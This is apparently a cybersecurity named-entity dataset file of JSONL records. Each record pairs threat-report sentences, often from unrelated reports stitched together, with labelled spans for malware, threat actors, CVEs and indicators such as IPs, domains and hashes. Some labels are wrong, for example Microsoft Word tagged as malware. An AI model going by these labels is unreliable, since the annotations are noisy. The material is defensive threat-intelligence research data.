{"text": "Trend Micro detects these as ANDROIDOS_XLOADER.HRX . The heavier targeting in Pakistan adheres to historical targeting and the ongoing tension between the two countries , which has escalated since a terrorist attack in Kashmir on 14 February 2019 . Once the macro is executed , the malware downloads two files from “ kentona[.su ” , using an SSL encrypted communication , and stores them in “ C:\\Users\\Public ” path : “ rtegre.exe ” and “ wprgxyeqd79.exe ” .", "spans": {"Organization: Trend Micro": [[0, 11]], "Indicator: kentona[.su": [[317, 328]], "Indicator: rtegre.exe": [[420, 430]], "Indicator: wprgxyeqd79.exe": [[439, 454]]}, "info": {"id": "cyberner_stix_valid_000512", "source": "cyberner_stix_valid"}}
{"text": "Payment card dumps are commonly shared amongst Brazilian threat actors via social media forums such as Facebook , Skype , and web-based WhatsApp messenger . An Iranian hacking group formerly named Ajax Security ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": {"Organization: social media forums": [[75, 94]], "Organization: CrowdStrike": [[245, 256]], "Organization: dissidents": [[311, 321]]}, "info": {"id": "cyberner_stix_valid_000513", "source": "cyberner_stix_valid"}}
{"text": "This sample is clearly a mix between the two . Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands . The changes to RIPTIDE were significant enough to circumvent existing RIPTIDE detection rules . RedLeaves can use HTTP over non - standard ports , such as 995 , for C2.Rocke 's miner connects to a C2 server using port 51640.[32 ]", "spans": {"Malware: RIPTIDE": [[181, 188], [236, 243]], "Malware: RedLeaves": [[262, 271]], "System: C2 server": [[363, 372]]}, "info": {"id": "cyberner_stix_valid_000514", "source": "cyberner_stix_valid"}}
{"text": "Recently , Sophos Labs has observed criminal groups scanning the internet for open MySQL databases running on Windows systems , which they tried to infect with GandCrab . The server used to host these malware samples was located on the German provider Hetzner ( 148.251.55.114 ) , within a small block of IP addresses that are registered with the customer ID \" HOS-156205 \" .", "spans": {"Organization: Sophos Labs": [[11, 22]], "Organization: provider": [[243, 251]]}, "info": {"id": "cyberner_stix_valid_000515", "source": "cyberner_stix_valid"}}
{"text": "If an incoming SMS contains one of the following magic strings : ” 2736428734″ or ” 7238742800″ the malware will execute multiple initial commands : Keylogger implementation Keylogging is implemented in an original manner . This malware report contains analysis of one 32-bit Windows executable file , identified as a Remote Access Trojan ( RAT ) . APT33 : c7a2559f0e134cafbfc27781acc51217127a7739c67c40135be44f23b3f9d77b S-SHA2 AutoIt FTP tool . Attackers could exploit these vulnerabilities to carry out a variety of attacks , in some cases gaining the ability to execute remote code on the targeted machine .", "spans": {"Malware: 32-bit Windows executable file": [[269, 299]], "Malware: c7a2559f0e134cafbfc27781acc51217127a7739c67c40135be44f23b3f9d77b S-SHA2 AutoIt FTP": [[357, 439]]}, "info": {"id": "cyberner_stix_valid_000516", "source": "cyberner_stix_valid"}}
{"text": "Actor : The attacker organization ; real humans driven by various motivations -- In the case of TA505 , the motivations are financial .", "spans": {}, "info": {"id": "cyberner_stix_valid_000517", "source": "cyberner_stix_valid"}}
{"text": "Split Strings Encrypted strings can be a signal that the code is trying to hide something . The group subsequently stole communications related to the firm 's business relationship with a national military , including inventories and memoranda about specific products they provided . GetCMD Remote Shell . June also witnessed a staggering increase in attacks from relatively new gangs such as Akira ( 26 ) and 8Base ( 41 ) , enough to propel both of them into the top five — a designation usually reserved for more familiar names like ALPHV , who was conspicuously silent in June .", "spans": {"Organization: communications": [[121, 135]], "Organization: military": [[197, 205]]}, "info": {"id": "cyberner_stix_valid_000518", "source": "cyberner_stix_valid"}}
{"text": "These tools often lay the groundwork for further malicious activity , such as the targeting of antivirus capabilities and the disabling of firewalls , both of which are very fundamental defensive measures . While we did not discuss the surrounding attacks using Bookworm in detail , we have observed threat actors deploying Bookworm primarily in attacks on targets in Thailand .", "spans": {"Malware: Bookworm": [[262, 270], [324, 332]]}, "info": {"id": "cyberner_stix_valid_000519", "source": "cyberner_stix_valid"}}
{"text": "Port 6210 : SBrowser extraction service . The threat then executes \" svchost.exe \" . Potentially fake , leaked Hamas documents . \" These [ Rising Sun ] implants were all based on the original Backdoor Duuzer source code , \" the researchers say in their report .", "spans": {"System: SBrowser": [[12, 20]], "Malware: Backdoor Duuzer source code": [[192, 219]]}, "info": {"id": "cyberner_stix_valid_000520", "source": "cyberner_stix_valid"}}
{"text": "Registering broadcast receivers enable XLoader to trigger its malicious routines . wuaupdt.exe is a CMD backdoor , which can receive and execute CMD commands sent from C2 . It has a structure similar to previous “ wprgxyeqd79.exe ” file : two of their files have the same name , but the content of this new SFX is extracted in the “ %ALLUSERSPROFILE%\\Windows Anytime Upgrade ” directory .", "spans": {"Malware: XLoader": [[39, 46]], "Malware: wuaupdt.exe": [[83, 94]], "Indicator: wprgxyeqd79.exe": [[214, 229]], "System: %ALLUSERSPROFILE%\\Windows": [[333, 358]]}, "info": {"id": "cyberner_stix_valid_000521", "source": "cyberner_stix_valid"}}
{"text": "Sometimes , we can attribute different apps to the same author based on a small , unique pieces of evidence that suggest similarity , such as a repetition of an exceptionally rare code snippet , asset , or a particular string in the debug logs . MoneyTaker uses ' fileless ' malware only existing in RAM and is destroyed after reboot . The encoded payload is written to a temporary file , decoded and executed in a hidden window . • Use of additional offensive security tools Covenant , Nishang , and PowerCat for remote access .", "spans": {}, "info": {"id": "cyberner_stix_valid_000522", "source": "cyberner_stix_valid"}}
{"text": "As it launches , it requests device administrator rights , and then starts communicating with its C & C server . Ke3chang has also leveraged a Java zero-day vulnerability ( CVE-2012-4681 ) , as well as older , reliable exploits for Microsoft Word ( CVE-2010-3333 ) and Adobe PDF Reader ( CVE-2010-2883 ) . It 's possible that Lazarus is using RATANKBA to target larger organizations .", "spans": {"Vulnerability: Java zero-day vulnerability": [[143, 170]], "Vulnerability: CVE-2012-4681": [[173, 186]], "Malware: Microsoft Word": [[232, 246]], "Vulnerability: CVE-2010-3333": [[249, 262]], "Vulnerability: CVE-2010-2883": [[288, 301]], "Malware: RATANKBA": [[343, 351]]}, "info": {"id": "cyberner_stix_valid_000523", "source": "cyberner_stix_valid"}}
{"text": "What makes this malware extremely powerful is the capability to adapt after it 's deployed . This domain and IP address has been previously associated with the BITTER APT and targeting government agencies in China with phishing attacks , based on reporting from 360-CERT . APT33 leverages popular Iranian hacker tools and DNS servers used by other suspected Iranian threat groups .", "spans": {"Organization: government agencies": [[185, 204]], "Organization: 360-CERT": [[262, 270]]}, "info": {"id": "cyberner_stix_valid_000524", "source": "cyberner_stix_valid"}}
{"text": "It is likely that BRONZE PRESIDENT has additional unobserved operational tools and capabilities .", "spans": {}, "info": {"id": "cyberner_stix_valid_000525", "source": "cyberner_stix_valid"}}
{"text": "CTU researchers assess with moderate confidence that APT28 is operating from the Russian Federation and is gathering intelligence on behalf of the Russian government . Since we published out last report on SLUB , the backdoor has been updated and several improvements were implemented . The SLUB malware was delivered through watering hole websites that were injected with exploits for CVE-2018-8174 or CVE-2019-0752 . During this attack , we found that the SLUB malware used two Slack teams sales-yww9809” and marketing-pwx7789 . SWEED remains consistent across most of their campaigns in their use of spear-phishing emails with malicious attachments . In April 2018 , SWEED began making use of a previously disclosed Office exploit . In May 2018 , campaigns being conducted by SWEED began leveraging another vulnerability in Microsoft Office: CVE-2017-11882 , a remote code execution bug in Microsoft Office that is commonly observed being leveraged in malicious documents used in commodity malware distribution . We found them targeting countries in the Middle East such as United Arab Emirates and Saudi Arabia , as well as other countries such as India , Japan , Argentina , the Philippines , and South Korea . Similar to previous campaigns , the JAR was directly attached to emails and used file names such as Order_2018.jar . Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework .", "spans": {"Organization: CTU": [[0, 3]], "Organization: Russian government": [[147, 165]], "Malware: backdoor": [[217, 225]], "Vulnerability: CVE-2018-8174": [[386, 399]], "Vulnerability: CVE-2019-0752": [[403, 416]], "Vulnerability: exploit": [[726, 733], [1385, 1392]], "Organization: Microsoft": [[827, 836], [893, 902]], "Vulnerability: CVE-2017-11882": [[845, 859]], "Indicator: JAR": [[1252, 1255]], "Malware: Order_2018.jar": [[1316, 1330]], "Indicator: slides": [[1366, 1372]], "Vulnerability: CVE-2017-8759": [[1397, 1410]]}, "info": {"id": "cyberner_stix_valid_000526", "source": "cyberner_stix_valid"}}
{"text": "Security solutions can detect it in countless combinations with other suspicious permissions and functions , or malicious functionalities – but when faced with no additional functionality nor permission , all failed to trigger any alarm on DEFENSOR ID . This malicious site used CVE-2019-0752 , an Internet Explorer vulnerability discovered by Trend Micro’s Zero Day Initiative (ZDI) that was just patched this April . While the tools profiled in this report are not inherently malicious , their capabilities are nonetheless integral to the Lazarus Group 's cyber operations , both espionage and destructive in nature , making them inherently dangerous to potential victims .", "spans": {"Malware: DEFENSOR ID": [[240, 251]], "Vulnerability: CVE-2019-0752": [[279, 292]], "Organization: Trend Micro’s": [[344, 357]]}, "info": {"id": "cyberner_stix_valid_000527", "source": "cyberner_stix_valid"}}
{"text": "For example , this could be when the victim ’ s device connects to a Wi-Fi access point that is infected or controlled by the attackers . Japan is no stranger to banking malware . Multiple China-based cyber threat groups have targeted international media organizations in the past .", "spans": {"Malware: banking": [[162, 169]], "Malware: malware": [[170, 177]], "Organization: international media organizations": [[235, 268]]}, "info": {"id": "cyberner_stix_valid_000528", "source": "cyberner_stix_valid"}}
{"text": "Known for hijacking prominent social media accounts , the self-styled white hat hacking group OurMine took over a number of verified Twitter and Facebook accounts belonging to the cable network . The APT group is reportedly targeting the Middle East region .", "spans": {"Organization: social media": [[30, 42]], "Organization: Twitter": [[133, 140]], "Organization: Facebook": [[145, 153]]}, "info": {"id": "cyberner_stix_valid_000529", "source": "cyberner_stix_valid"}}
{"text": "The Rancor group 's attacks use two primary malware families which we describe in depth later in this blog and are naming DDKONG and PLAINTEE . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server .", "spans": {"Indicator: China Chopper": [[148, 161]], "Vulnerability: exploit": [[223, 230], [254, 261]], "System: Windows": [[266, 273]], "Vulnerability: CVE-2015-0062": [[290, 303]], "Vulnerability: CVE-2015-1701": [[306, 319]], "Vulnerability: CVE-2016-0099": [[324, 337]]}, "info": {"id": "cyberner_stix_valid_000530", "source": "cyberner_stix_valid"}}
{"text": "Our research team has found infected apps on third-party app stores , but they could also be downloaded by Android users directly by tapping malicious links in phishing attack messages . APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol ( RDP ) , Secure Shell ( SSH ) , PsExec , RemCom , and xCmdSvc . There are some variants with this pattern ( e.g , the variable – 10 < 0 ) Given that threat actors use red team tools and public exploitation frameworks for targeted threat activity in the wild , we believe COSMICENERGY poses a plausible threat to affected electric grid assets .", "spans": {"System: Android": [[107, 114]], "Malware: COSMICENERGY": [[547, 559]], "System: electric grid assets": [[597, 617]]}, "info": {"id": "cyberner_stix_valid_000531", "source": "cyberner_stix_valid"}}
{"text": "When this HTTP request completes , the event listener will call the ‘ onload2 ’ function .", "spans": {}, "info": {"id": "cyberner_stix_valid_000532", "source": "cyberner_stix_valid"}}
{"text": "Therefore , we believe that the same threat group is behind both intrusions .", "spans": {}, "info": {"id": "cyberner_stix_valid_000533", "source": "cyberner_stix_valid"}}
{"text": "The Curious Case of Notepad and Chthonic : Exposing a Malicious Infrastructure .", "spans": {"Malware: Chthonic": [[32, 40]]}, "info": {"id": "cyberner_stix_valid_000534", "source": "cyberner_stix_valid"}}
{"text": "If the user has launched Play Market , the Trojan intercepts the event and displays a window on top of the Google Play window , prompting the user to enter his/her bank card details in the fake window . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including education . These tools are used to further compromise the organization by attacking other hosts inside the targets network . Furthermore , these reports indicated that Zarya was cooperating with or being handled by officers of Russia ’s Federal Security Service ( FSB ) .", "spans": {"System: Play Market": [[25, 36]], "System: Google Play": [[107, 118]], "Organization: education": [[313, 322]], "Organization: Russia ’s Federal Security Service ( FSB )": [[541, 583]]}, "info": {"id": "cyberner_stix_valid_000535", "source": "cyberner_stix_valid"}}
{"text": "This new organization seems to work on securing Android devices . The following examples were developed using a Winnti installer that was used in attacks in December 2016 . In most cases , the attacks involved Adobe Acrobat , Reader , and Flash Player exploits such as : CVE-2009-4324 , CVE-2009-0927 , CVE-2011-0609 , CVE-2011-0611 . RussianPanda ( @AnFam17 ) named the URL shortcut campaign RogueRaticate .", "spans": {"Organization: Android": [[48, 55]], "Vulnerability: CVE-2009-4324": [[271, 284]], "Vulnerability: CVE-2009-0927": [[287, 300]], "Vulnerability: CVE-2011-0609": [[303, 316]], "Vulnerability: CVE-2011-0611": [[319, 332]], "Organization: RussianPanda": [[335, 347]], "Malware: RogueRaticate": [[393, 406]]}, "info": {"id": "cyberner_stix_valid_000536", "source": "cyberner_stix_valid"}}
{"text": "The updated tool has only been seen in a handful of victim computers within organizational networks in Southeast Asia—PLATINUM is known to customize tools based on the network architecture of targeted organizations . At this point , the current attack campaign against the chemical industry began .", "spans": {"Organization: chemical industry": [[273, 290]]}, "info": {"id": "cyberner_stix_valid_000537", "source": "cyberner_stix_valid"}}
{"text": "Based on our observations , this group uses a variety of different methods to either compromise or acquire already compromised payment card credentials . The May 2014 ' Operation Saffron Rose ' publication identifies an Iranian hacking group formerly named ' Ajax Security ' ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": {"Organization: CrowdStrike": [[309, 320]], "Organization: dissidents": [[375, 385]]}, "info": {"id": "cyberner_stix_valid_000538", "source": "cyberner_stix_valid"}}
{"text": "The admin@338 linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong . In April , shortly after the Trojan 's discovery , researchers observed a massive GozNym campaign targeting 24 North American banks .", "spans": {"Organization: governments": [[97, 108]], "Malware: Trojan": [[230, 236]], "Organization: banks": [[327, 332]]}, "info": {"id": "cyberner_stix_valid_000539", "source": "cyberner_stix_valid"}}
{"text": "After receiving the rights , it sets itself as the default SMS app and disappears from the device screen . CTU researchers have observed TG-3390 activity between 04:00 and 09:00 UTC , which is 12:00 to 17:00 local time in China ( UTC +8 ) . It then resets cron and removes possible cache files from other programs , starts scripts and binaries a , init0 , and start , and sets the persistence by modifying the crontab . CrowdStrike Services recently investigated several Play ransomware intrusions where the common entry vector was suspected to be the Microsoft Exchange ProxyNotShell vulnerabilities CVE-2022 - 41040 and CVE-2022 - 41082 .", "spans": {"Organization: CTU": [[107, 110]], "Indicator: a": [[344, 345]], "Indicator: init0": [[348, 353]], "Organization: CrowdStrike Services": [[420, 440]], "Vulnerability: CVE-2022 - 41040": [[601, 617]], "Vulnerability: CVE-2022 - 41082": [[622, 638]]}, "info": {"id": "cyberner_stix_valid_000540", "source": "cyberner_stix_valid"}}
{"text": "Coralco Tech 's services description . Lurk uses a form of steganography : that's where one file is hidden away inside another file of a completely different sort , such as an image , audio , or video file . Once decoded , this blob reveals a standardized structure of the information sent to the registered C&C server , which includes the following details : Computer name , Local IP address , Proxy server IP and port , Malware ID . It is therefore recommended to set the code only as a response for or methods and to use instead , as the method change is explicitly prohibited in that case .", "spans": {}, "info": {"id": "cyberner_stix_valid_000541", "source": "cyberner_stix_valid"}}
{"text": "The documents that exploit CVE2017-11882 download another payload — an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script — from the server , which is executed accordingly by the command-line tool mshta.exe . TG-3390 uses older exploits to compromise targets , and CTU researchers have not observed the threat actors using zero-day exploits as of this publication .", "spans": {"Vulnerability: CVE2017-11882": [[27, 40]], "Malware: HTA": [[90, 93]], "Malware: mshta.exe": [[223, 232]], "Organization: CTU": [[291, 294]], "Vulnerability: zero-day": [[349, 357]]}, "info": {"id": "cyberner_stix_valid_000542", "source": "cyberner_stix_valid"}}
{"text": "TG-0416 is a stealthy and extremely successful Advanced Persistent Threat ( APT ) group known to target a broad range of verticals since at least 2009 , including technology , industrial , manufacturing , human rights groups , government , pharmaceutical , and medical technology . By the end of April , GozNym had redirection instructions for 17 Polish banks in its repertoire , along with an extra 230 URLs designed to assist attackers in targeting community banks and email service providers in the Eastern European country .", "spans": {"Organization: technology": [[163, 173]], "Organization: industrial": [[176, 186]], "Organization: manufacturing": [[189, 202]], "Organization: human rights groups": [[205, 224]], "Organization: government": [[227, 237]], "Organization: pharmaceutical": [[240, 254]], "Organization: medical technology": [[261, 279]], "Malware: GozNym": [[304, 310]], "Organization: banks": [[354, 359]], "Organization: community banks": [[451, 466]], "Organization: email service providers": [[471, 494]]}, "info": {"id": "cyberner_stix_valid_000543", "source": "cyberner_stix_valid"}}
{"text": "Of note , FireEye discovered two additional new malware families hosted at this domain , VALUEVAULT and LONGWATCH . Once exploit has been achieved , Nidiran is delivered through a self-extracting executable that extracts the components to a .tmp folder after it has been executed .", "spans": {"Organization: FireEye": [[10, 17]], "Malware: VALUEVAULT": [[89, 99]], "Malware: LONGWATCH": [[104, 113]], "Vulnerability: exploit": [[121, 128]], "Malware: Nidiran": [[149, 156]], "Malware: self-extracting executable": [[180, 206]], "Indicator: .tmp": [[241, 245]]}, "info": {"id": "cyberner_stix_valid_000544", "source": "cyberner_stix_valid"}}
{"text": "Apart from injecting code to read the CAPTCHA , the app also injects its own code into the system_server process , which requires root privileges . The Sogu gang use a custom developed threat – Backdoor.Sogu , whereas the group described in this document use an off the shelf threat – Poison Ivy . APT17 , also known as DeputyDog , is a Chinabased threat group that FireEye Intelligence has observed conducting network intrusions against U.S. government entities , the defense industry , law firms , information technology companies , mining companies , and non-government organizations . To compromise the victims , the attackers used extremely effective social engineering techniques which involved sending malicious PDF documents to their targets .", "spans": {"Organization: FireEye": [[366, 373]]}, "info": {"id": "cyberner_stix_valid_000545", "source": "cyberner_stix_valid"}}
{"text": "] it Firenze serverrt.exodus.connexxa [ . Furthermore , Dragos' analysis of the TRISIS event continues as we recover additional data surrounding the incident . This command is used to upload collected data to the C2 server . By creating awareness and using the right solutions , both individuals and organizations can take the steps needed to defend against the malicious tactics used by threat actors like the Winnti group .", "spans": {"Organization: Dragos'": [[56, 63]]}, "info": {"id": "cyberner_stix_valid_000546", "source": "cyberner_stix_valid"}}
{"text": "These new tactics of selectively targeting organizations for high ransomware payouts have signaled a shift in INDRIK SPIDER 's operation with a new focus on targeted , low-volume , high-return criminal activity : a type of cybercrime operation we refer to as big game hunting . ScarCruft infected this victim on September 21 , 2018 .", "spans": {}, "info": {"id": "cyberner_stix_valid_000547", "source": "cyberner_stix_valid"}}
{"text": "The malware searches both internal and external storage and encrypts them using RC4 . Wild Neutron hit the spotlight in 2013 , when it successfully infected companies such as Apple , Facebook , Twitter and Microsoft . ScarCruft continues to evolve, introduces Bluetooth harvester . Both of these campaigns use a similar structure with compromised WordPress sites hosting the lure shortcuts and a WebDav server that loads NetSupport RAT .", "spans": {"Organization: Apple": [[175, 180]], "Organization: Facebook": [[183, 191]], "Organization: Twitter": [[194, 201]], "Organization: Microsoft": [[206, 215]], "System: WordPress sites": [[347, 362]], "System: WebDav server": [[396, 409]]}, "info": {"id": "cyberner_stix_valid_000548", "source": "cyberner_stix_valid"}}
{"text": "We ’ ve noticed an increase in the number of attacks using this event as a lure . This bait document , or email attachment , appears to be a standard Word document , but is in fact an CVE-2012-0158 exploit , an executable with a double extension , or an executable with an RTLO filename , so it can execute code without the user 's knowledge or consent . In the Naikon scheme , a C&C server can be specialized XSControl software running on the host machine .", "spans": {"Malware: bait document": [[87, 100]], "Malware: Word document": [[150, 163]], "Vulnerability: CVE-2012-0158": [[184, 197]], "Malware: C&C server": [[380, 390]]}, "info": {"id": "cyberner_stix_valid_000549", "source": "cyberner_stix_valid"}}
{"text": "In November 2017 , APT34 leveraged the Microsoft Office vulnerability CVE-2017-11882 to deploy POWRUNER and BONDUPDATER less than a week after Microsoft issued a patch . Our research shows that compromised organizations are at risk of not only being spied on by the Turla group who planted the backdoor , but also by other attackers .", "spans": {"Vulnerability: Microsoft Office vulnerability": [[39, 69]], "Vulnerability: CVE-2017-11882": [[70, 84]], "Organization: Microsoft": [[143, 152]]}, "info": {"id": "cyberner_stix_valid_000550", "source": "cyberner_stix_valid"}}
{"text": "In another case , Vcrodat was also used in an attack on a UK-based organization in the hospitality sector . According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL .", "spans": {"Organization: hospitality sector": [[87, 105]], "Organization: FireEye": [[121, 128]], "Vulnerability: exploit": [[204, 211]], "Organization: Microsoft Office": [[212, 228]], "Vulnerability: vulnerabilities": [[229, 244]], "Malware: LOWBALL": [[295, 302]]}, "info": {"id": "cyberner_stix_valid_000551", "source": "cyberner_stix_valid"}}
{"text": "Due to the specific nature of its activity , Perkele is distributed in a rather unusual way . Finally , some of the victims are also infected with other Turla-related malware such as ComRAT or Gazer . An individual who goes by the name LZX in some online forums is believed to be the original author of ZxShell . Supply Chain Attack", "spans": {"Malware: Perkele": [[45, 52]], "Malware: ZxShell": [[303, 310]]}, "info": {"id": "cyberner_stix_valid_000552", "source": "cyberner_stix_valid"}}
{"text": "PROMETHIUM distributed links through instant messengers , pointing recipients to malicious documents that invoked the exploit code to launch Truvasys on victim computers . The objective of the attacks is clearly espionage – they involve gaining access to top legislative , executive and judicial bodies around the world .", "spans": {}, "info": {"id": "cyberner_stix_valid_000553", "source": "cyberner_stix_valid"}}
{"text": "So far we have identified the following behaviors : Sending device information to a remote command and control ( C2 ) server . The Middle Eastern hacker group in this case is codenamed \" BlackOasis \" Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . If we decide to open the document , we see that the document is empty , but it requires the enabling of the macro . Spyware can even be used to track the device 's physical location and record from the camera or microphone .", "spans": {"Organization: Kaspersky": [[200, 209]], "Vulnerability: Adobe Flash Player zero-day vulnerability": [[243, 284]], "Vulnerability: CVE-2016-4117": [[287, 300]], "Malware: Spyware": [[530, 537]]}, "info": {"id": "cyberner_stix_valid_000554", "source": "cyberner_stix_valid"}}
{"text": "In scenarios where wire fraud is not as lucrative an option , INDRIK SPIDER might use ransomware to monetize the compromise instead . In August 2017 , the National Bank of Ukraine warned state-owned and private banks across the country about a large-scale phishing attack .", "spans": {"Organization: National Bank": [[155, 168]], "Organization: private banks": [[203, 216]]}, "info": {"id": "cyberner_stix_valid_000555", "source": "cyberner_stix_valid"}}
{"text": "This routine is a form of generic and variable generator of DLL side-loading combinations . These characteristics suggest that COBALT GYPSY executed the January and February phishing campaigns and that it created the Mia Ash persona . This DLL does not contain an export table and its entire functionality resides in the DllMain routine . • None consisting of CVE-2022 - 41080 and CVE-2022 - 41082 to achieve remote code execution ( RCE ) through Outlook Web Access ( OWA ) .", "spans": {"Vulnerability: CVE-2022 - 41080": [[360, 376]], "Vulnerability: CVE-2022 - 41082": [[381, 397]]}, "info": {"id": "cyberner_stix_valid_000556", "source": "cyberner_stix_valid"}}
{"text": "The malicious bash script components of the malware are hosted in Pastebin , with the profile name \" SYSTEMTEN \" , which is very similar to previous names used by the \" Rocke \" threat group . We continue to track the Wild Neutron group , which is still active as of June 2015 .", "spans": {}, "info": {"id": "cyberner_stix_valid_000557", "source": "cyberner_stix_valid"}}
{"text": "A second Quasar sample was also observed attacking this new victim :", "spans": {"Malware: Quasar": [[9, 15]]}, "info": {"id": "cyberner_stix_valid_000558", "source": "cyberner_stix_valid"}}
{"text": "After the demise of Storm , it was replaced by another new botnet known as Waledac that also leveraged peer-to-peer communications . Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday .", "spans": {"Organization: Kaspersky": [[133, 142]], "Vulnerability: zero-day": [[195, 203]], "Vulnerability: CVE-2016-4117": [[220, 233]], "Malware: FinSpy": [[280, 286]]}, "info": {"id": "cyberner_stix_valid_000559", "source": "cyberner_stix_valid"}}
{"text": "As will become evident in this report , this was not a one-off case but a recurring theme with the Dukes , in that they would rather continue with their operations as planned than retreat from operating under the spotlight .", "spans": {}, "info": {"id": "cyberner_stix_valid_000560", "source": "cyberner_stix_valid"}}
{"text": "North Korea's Office 39 is involved in activities such as gold smuggling , counterfeiting foreign currency , and even operating restaurants . Our investigation showed that these attacks were targeted , and that the threat actor sought to steal communications data of specific individuals in various countries .", "spans": {"Organization: specific individuals": [[267, 287]]}, "info": {"id": "cyberner_stix_valid_000561", "source": "cyberner_stix_valid"}}
{"text": "However , the unique malware variant , BlackEnergy 3 , reemerged in Ukraine early in 2015 , where we had first found Sandworm Team . Researching this attack and the malware used therein led Microsoft to discover other instances of PLATINUM attacking users in India around August 2015 .", "spans": {"Malware: BlackEnergy 3": [[39, 52]], "Organization: Microsoft": [[190, 199]], "Organization: users": [[250, 255]]}, "info": {"id": "cyberner_stix_valid_000562", "source": "cyberner_stix_valid"}}
{"text": "Android services are components that can be made to execute independently in the background without the victim 's knowledge . In a more recent version of the modified Gh0st RAT malware , Ghost Dragon implemented dynamic packet flags which change the first five bytes of the header in every login request with the controller . This second request ( Encoded Get System Information Request ) is encoded using the same method as the custom TCP protocol used for communication with command-and-control servers , which uses a four-byte XOR encoding .", "spans": {"System: Android": [[0, 7]], "Malware: Gh0st RAT": [[167, 176]]}, "info": {"id": "cyberner_stix_valid_000563", "source": "cyberner_stix_valid"}}
{"text": "In this case however the targets were in different geopolitical regions .", "spans": {}, "info": {"id": "cyberner_stix_valid_000564", "source": "cyberner_stix_valid"}}
{"text": "Using AutoFocus , we pivoted from the user agent string to expand our data set to three additional Zebrocy samples using the exact same user agent .", "spans": {"Malware: Zebrocy": [[99, 106]]}, "info": {"id": "cyberner_stix_valid_000565", "source": "cyberner_stix_valid"}}
{"text": "Network administrators are encouraged to apply the following recommendations , which can prevent as many as 85 percent of targeted cyber intrusions .", "spans": {}, "info": {"id": "cyberner_stix_valid_000566", "source": "cyberner_stix_valid"}}
{"text": "Yet irrespective of this , it is confusing why the previously-declared “ TEMP ” category was walked back as this has led to not small amount of confusion – in both technical and non-technical audiences – as to just what FireEye ’s blog post refers .", "spans": {"Organization: FireEye": [[220, 227]]}, "info": {"id": "cyberner_stix_valid_000567", "source": "cyberner_stix_valid"}}
{"text": "This event triggers archive downloading thread . Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 . The United States and countries in Europe are targeted as well .", "spans": {"Vulnerability: CVE-2012-0158": [[178, 191]]}, "info": {"id": "cyberner_stix_valid_000568", "source": "cyberner_stix_valid"}}
{"text": "For the past five months , Check Point researchers have quietly observed the China-based advertising company behind HummingBad in several ways , including by infiltrating the command and control servers it uses . These files have the capability to download and install malware , install proxy and Remote Access Trojans ( RATs ) , connect to command and control ( C2 ) servers to receive additional instructions , and modify the victim 's firewall to allow incoming connections . APT33 : 8.26.21.119 [REDACTED].ddns.net . Its demands for ransom have exceeded 145 million , with collections exceeding 60 million .", "spans": {"Organization: Check Point": [[27, 38]], "Malware: HummingBad": [[116, 126]], "Indicator: 8.26.21.119": [[487, 498]], "Indicator: [REDACTED].ddns.net": [[499, 518]]}, "info": {"id": "cyberner_stix_valid_000569", "source": "cyberner_stix_valid"}}
{"text": "The software manages the delivery of firmware updates over-the-air , the term used for transmission via a mobile network . We believe APT10 is the most significant known Chinese state-sponsored cyber threat to global corporations . Minzen : 797d9c00022eaa2f86ddc9374f60d7ad92128ca07204b3e2fe791c08da9ce2b1 .", "spans": {"Malware: Minzen": [[232, 238]], "Indicator: 797d9c00022eaa2f86ddc9374f60d7ad92128ca07204b3e2fe791c08da9ce2b1": [[241, 305]]}, "info": {"id": "cyberner_stix_valid_000570", "source": "cyberner_stix_valid"}}
{"text": "However , relative to the total number of attacks , few are fully disclosed .", "spans": {}, "info": {"id": "cyberner_stix_valid_000571", "source": "cyberner_stix_valid"}}
{"text": "App icons under which Asacub masks itself The APK files of the Trojan are downloaded from sites such as mmsprivate [ . CTU researchers have observed the threat actors installing a credential logger and backdoor on Microsoft Exchange servers , which requires a technical grasp of Internet Information Services ( IIS ) . If the system has been previously infected with a cryptominer , it also attempts to kill the running miner and all its related activities . Rhysida , a new ransomware gang claiming to be a \" cybersecurity team , \" has been in operation since May 17 , 2023 , making headlines for their high - profile attack against the Chilean Army .", "spans": {"Malware: Asacub": [[22, 28]], "Organization: CTU": [[119, 122]], "Organization: Chilean Army": [[638, 650]]}, "info": {"id": "cyberner_stix_valid_000572", "source": "cyberner_stix_valid"}}
{"text": "Kaspersky also published details on how Zebrocy has added the Go” language to its arsenal – the first time that we have observed a well-known APT threat actor deploy malware with this compiled , open source language . Figure 1 shows a sample phishing email used by HawkEye operators in this latest campaign .", "spans": {"Organization: Kaspersky": [[0, 9]], "Indicator: phishing email": [[242, 256]]}, "info": {"id": "cyberner_stix_valid_000573", "source": "cyberner_stix_valid"}}
